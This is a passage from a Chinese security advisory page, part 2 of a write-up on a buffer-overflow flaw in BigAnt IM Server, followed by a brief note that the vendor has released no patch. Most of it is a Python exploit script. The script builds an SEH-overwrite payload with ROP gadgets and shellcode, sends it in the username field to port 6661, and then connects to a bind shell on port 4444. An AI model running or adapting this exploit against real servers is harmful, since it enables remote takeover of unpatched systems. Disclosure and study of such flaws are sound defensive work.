BigAnt IM Server缓冲区溢出漏洞(2)

日期:2020-06-06 栏目:程序人生 浏览:

front = "A" * 684
 seh = struct.pack('<L',0x0f9eeb8a) # ADD ESP,1004 [expsrv.dll]
 back = "C" * 1592
 stack_adjust = "\x81\xc4\x24\xfa\xff\xff"
 junk = "D" * (4000 - (len(front) + len(seh) + len(back) + len(rop_gadgets) + len(stack_adjust) + len(sc)))

sploit = front + seh + back + rop_gadgets + stack_adjust + sc + junk
 print "[+] Sending pwnag3 to " + str(host)

try :
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,6661))
    s.send(""
    "DDNF 17\n"
    "classid: 100\n"
    "cmdid: 1\n"
    "objid: 1\n"
    "rootid: 3\n"
    "userid: 8\n"
    "username: "+sploit+
    "\r\n\r\n")
    time.sleep(1)
 except:
    print "[-] There was a problem"
    sys.exit()

print "[+] Getting your shell. "
 time.sleep(3)
 subprocess.Popen("telnet "+host+" 4444",shell=True).wait()
 print"[*] Done."
 s.close()

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
bigantsoft
 ----------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

上一篇:ip6.c本地信息泄露漏洞(CVE
下一篇:js和jQuery以及easyui实现对下拉框的指定赋值方法

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/ppxpp.html

相关推荐